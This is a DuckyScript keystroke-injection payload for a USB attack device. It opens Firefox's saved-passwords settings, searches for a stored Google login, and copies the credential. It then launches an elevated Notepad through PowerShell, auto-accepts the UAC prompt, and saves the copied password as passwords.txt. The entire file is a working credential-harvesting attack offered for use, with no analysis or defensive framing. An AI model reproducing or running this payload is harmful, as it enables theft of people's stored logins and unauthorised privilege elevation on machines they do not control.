DELAY 2000
REM --open firefox
GUI r
DELAY 1000
STRING firefox
DELAY 1000
ENTER
DELAY 4000
REM --copy password
STRING about:preferences#security
ENTER
DELAY 2000
REM --11 tabs then enter
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
STRING google
DELAY 500
REM --5 tabs then 2 enters then 4 ups
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
UP
DELAY 500
UP
DELAY 500
UP
DELAY 500
UP
DELAY 500
REM --right mouse(MENU) then three downs then enter
MENU
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
ENTER
DELAY 500
ALT F4
DELAY 500
REM --save to text file
GUI R
DELAY 500
STRING powershell start-process notepad.exe -Verb runAs
DELAY 500 
ENTER
DELAY 2000
ALT y
DELAY 1000
CTRL V
DELAY 500
ALT f
DELAY 500
STRING s
DELAY 500
STRING passwords.txt
DELAY 500
